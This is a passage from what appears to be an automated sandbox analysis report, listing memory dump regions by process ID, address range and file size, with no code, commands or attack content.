                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-341-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-342-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-345-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-348-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-347-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-349-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-351-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-352-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-353-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-350-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2768-354-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2804-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/2804-223-0x00000000023B0000-0x00000000024FA000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                                              • memory/2808-175-0x00000000002D0000-0x00000000002D1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2808-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/2808-193-0x0000000004AE0000-0x0000000004B56000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                                                                                              • memory/2840-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/2840-254-0x0000000000400000-0x00000000023BB000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                31.7MB

                                                                                                                                                                                                                                                                                              • memory/2840-242-0x0000000002420000-0x0000000002450000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                192KB

                                                                                                                                                                                                                                                                                              • memory/2844-368-0x0000000007352000-0x0000000007353000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2844-369-0x0000000007353000-0x0000000007354000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2844-365-0x0000000000400000-0x0000000002CD0000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                40.8MB

                                                                                                                                                                                                                                                                                              • memory/2844-370-0x0000000007354000-0x0000000007356000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/2844-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/2844-366-0x0000000007350000-0x0000000007351000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/2844-357-0x0000000002DB0000-0x0000000002DDF000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                188KB

                                                                                                                                                                                                                                                                                              • memory/2900-278-0x0000000001030000-0x0000000001046000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                88KB

                                                                                                                                                                                                                                                                                              • memory/2976-311-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                              • memory/2976-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/3112-235-0x0000000006100000-0x0000000006101000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/3112-192-0x00000000771D0000-0x000000007735E000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                              • memory/3112-209-0x0000000001240000-0x0000000001241000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/3112-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/3292-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/3308-327-0x0000000004960000-0x00000000049FD000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                628KB

                                                                                                                                                                                                                                                                                              • memory/3308-334-0x0000000000400000-0x0000000002D0E000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                41.1MB

                                                                                                                                                                                                                                                                                              • memory/3308-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/3600-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/3644-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/3880-208-0x0000000005560000-0x0000000005561000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/3880-222-0x0000000005640000-0x0000000005641000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/3880-230-0x0000000005630000-0x0000000005631000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/3880-189-0x00000000771D0000-0x000000007735E000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                              • memory/3880-210-0x00000000055C0000-0x00000000055C1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/3880-206-0x0000000005C50000-0x0000000005C51000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/3880-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/3880-194-0x00000000002E0000-0x00000000002E1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4060-258-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4060-225-0x0000000005950000-0x0000000005951000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4060-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4060-190-0x00000000771D0000-0x000000007735E000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                              • memory/4060-201-0x0000000001030000-0x0000000001031000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4072-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4072-289-0x0000000004910000-0x0000000005236000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                9.1MB

                                                                                                                                                                                                                                                                                              • memory/4072-293-0x0000000000400000-0x00000000027DB000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                35.9MB

                                                                                                                                                                                                                                                                                              • memory/4204-290-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4208-249-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4208-227-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                                              • memory/4208-231-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4208-269-0x0000000004FD0000-0x00000000054CE000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                5.0MB

                                                                                                                                                                                                                                                                                              • memory/4232-241-0x0000000000418F6E-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4232-236-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                                              • memory/4232-266-0x0000000004DD0000-0x00000000053D6000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.0MB

                                                                                                                                                                                                                                                                                              • memory/4652-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4652-285-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                                                                                              • memory/4712-384-0x0000000005A10000-0x0000000005A11000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4712-374-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4804-114-0x0000000003C10000-0x0000000003D4F000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                              • memory/4848-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4920-386-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4948-232-0x0000000000402FAB-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4948-229-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                              • memory/4960-261-0x0000000000418E52-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4960-287-0x0000000004E90000-0x0000000005496000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.0MB

                                                                                                                                                                                                                                                                                              • memory/4960-257-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                                              • memory/5008-372-0x000001C90C1D0000-0x000001C90C23F000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                444KB

                                                                                                                                                                                                                                                                                              • memory/5008-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5008-373-0x000001C90C240000-0x000001C90C30F000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                828KB

                                                                                                                                                                                                                                                                                              • memory/5088-477-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5216-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5288-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5304-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5324-530-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5560-427-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5600-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5632-454-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                              • memory/5632-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5652-437-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5676-497-0x00007FF789FA4060-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5680-460-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                              • memory/5680-439-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5716-463-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                              • memory/5716-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5744-445-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5776-448-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5800-449-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5836-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5836-458-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                436KB

                                                                                                                                                                                                                                                                                              • memory/5864-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5908-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5916-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5972-461-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5980-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/6036-464-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/6112-468-0x0000000000000000-mapping.dmp